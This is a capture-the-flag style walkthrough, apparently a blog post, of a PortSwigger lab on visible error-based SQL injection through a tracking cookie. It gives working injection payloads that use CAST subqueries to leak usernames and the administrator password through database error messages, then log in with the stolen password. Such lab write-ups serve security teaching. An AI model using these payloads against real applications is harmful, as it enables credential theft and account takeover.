1.9 Lab: Visible error-based SQL injection | 2023
This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned. The database contains a different table called users, with columns called username and password. Find a way to leak the password for the administrator and log in to solve the lab | Karthikeyan Nagaraj
Description
This lab contains a SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie. The results of the SQL query are not returned.
The database contains a different table called users
, with columns called username
and password
. To solve the lab, find a way to leak the password for the administrator
user, then log in to their account.
Pre-Requisite
Find the type of database using the below SQL Injection cheat sheet
Solution
- Capture the request of the homepage and send it to the repeater. we know that there is a tracking cookie where the vulnerability lies
- we have to use a conditional statement to append our query like
AND,OR,..
- If we use a Conditional statement, then we have to make sure that the query returns a boolean value like
5=5 AND 1=1
. So for this, we have to use the CAST option to convert a query into an Integer or Char based on the given value. Ex
1=CAST((select ‘a’) AS INT),
‘a’=CAST((select 1) AS CHAR) - For now, we’ll craft the query like the first case
- Sometimes the query may exceed the length. At the time remove the value or
TrackingId
- Inject the query at the end of
TrackingId
like below‘OR 1=CAST((SELECT username FROM users LIMIT 1) AS INT)--
- The Above query will be used to check whether
1
equals to the value of the inner query and, the inner query returns, only the 1st user from the user table because we have usedLIMIT 1
- The query will return an error because it cannot cast the value of the subquery. But, it returns the value of the subquery as the
username
- Now, we know that the first user is the administrator so,
- Use the same query, but replacing
username
withpassword
to retrieve the password‘OR 1=CAST((SELECT password FROM users LIMIT 1) AS INT)--
- Use the creds to log in to the administrator account to solve the lab...EnJ0y : )
Solution 2 — Portswigger
- Using Burp’s built-in browser, explore the lab functionality.
- Go to the Proxy > HTTP history tab and find a
GET /
request that contains aTrackingId
cookie. - In Repeater, append a single quote to the value of your
TrackingId
cookie and send the request.TrackingId=ogAZZfxtOKUELbuJ'
- In the response, notice the verbose error message. This discloses the full SQL query, including the value of your cookie. It also explains that you have an unclosed string literal. Observe that your injection appears inside a single-quoted string.
- In the request, add comment characters to comment out the rest of the query, including the extra single-quote character that’s causing the error:
TrackingId=ogAZZfxtOKUELbuJ'--
- Send the request. Confirm that you no longer receive an error. This suggests that the query is now syntactically valid.
- Adapt the query to include a generic
SELECT
subquery and cast the returned value to anint
data type:TrackingId=ogAZZfxtOKUELbuJ' AND CAST((SELECT 1) AS int)--
- Send the request. Observe that you now get a different error saying that an
AND
condition must be a boolean expression. - Modify the condition accordingly. For example, you can simply add a comparison operator (
=
) as follows:TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT 1) AS int)--
- Send the request. Confirm that you no longer receive an error. This suggests that this is a valid query again.
- Adapt your generic
SELECT
statement so that it retrieves usernames from the database:TrackingId=ogAZZfxtOKUELbuJ' AND 1=CAST((SELECT username FROM users) AS int)--
- Observe that you receive the initial error message again. Notice that your query now appears to be truncated due to a character limit. As a result, the comment characters you added to fix up the query aren’t included.
- Delete the original value of the
TrackingId
cookie to free up some additional characters. Resend the request.TrackingId=' AND 1=CAST((SELECT username FROM users) AS int)--
- Notice that you receive a new error message, which appears to be generated by the database. This suggests that the query was run properly, but you’re still getting an error because it unexpectedly returned more than one row.
- Modify the query to return only one row:
TrackingId=' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
- Send the request. Observe that the error message now leaks the first username from the
users
table:ERROR: invalid input syntax for type integer: "administrator"
- Now that you know that the
administrator
is the first user in the table, modify the query once again to leak their password:TrackingId=' AND 1=CAST((SELECT password FROM users LIMIT 1) AS int)--
- Log in as
administrator
using the stolen password to solve the lab.
If you would like to support me so that I can create more free content — https://www.buymeacoffee.com/cyberw1ng
Thank you for Reading!
Happy Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng
Telegram Channel for Ethical Hacking Dumps — https://t.me/ethicalhackingessentials